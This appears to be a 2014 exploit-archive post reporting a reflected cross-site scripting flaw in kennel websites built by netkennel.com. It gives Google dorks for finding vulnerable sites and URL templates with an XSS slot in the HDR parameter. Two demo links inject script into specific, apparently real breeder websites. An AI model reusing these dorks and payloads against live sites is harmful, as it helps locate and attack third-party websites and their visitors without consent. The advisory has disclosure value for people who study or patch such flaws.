facebook facebook twitter rss

PhotoAlbumlist Cross-site scripting Powered by netkennel.com

Author: Cyber Guard TeaM , Published: 02-11-2014
##############################################################
# Exploit Title: PhotoAlbumlist Cross-site scripting Powered by netkennel.com
#
# Exploit Author: Cyber Guard TeaM
#
# Discovered By: Injector
#
# Dork 1: inurl:/PhotoAlbumlist.asp?mnuid=
#
# Dork 2: inurl:PedigreeView.asp?DogID=
#
# Date: 1-11-2014
#
# Tested on: Kali, Win7
#
# Vendor's Website: www.netkennel.com
#
##############################################################
VULNERABILITY
##############
[~] VULNERABILITY}~~

[~] http://www.Site.com/PhotoAlbumlist.asp?mnuid=[Numbers]&HDR=[XSS]

[~] http://www.Site.com/PedigreeView.asp?DogID=[Numbers]&HDR=[XSS]

##############

demo 1: http://www.millcreeksetters.com/PhotoAlbumlist.asp?mnuid=14664&HDR=<script>alert('Hello Exploit4arab guys');</script>

demo 2: http://sherlockbrittanys.com/PedigreeView.asp?DogID=34359&HDR=<script>alert('Hello Exploit4arab guys');</script>

##############################################################
Contact number: +1 647 69 64 247
Contact mail: injector@rogers.com
-------------------Special Thanks of : All persian guys-------------------
##############################################################

Like us on Facebook :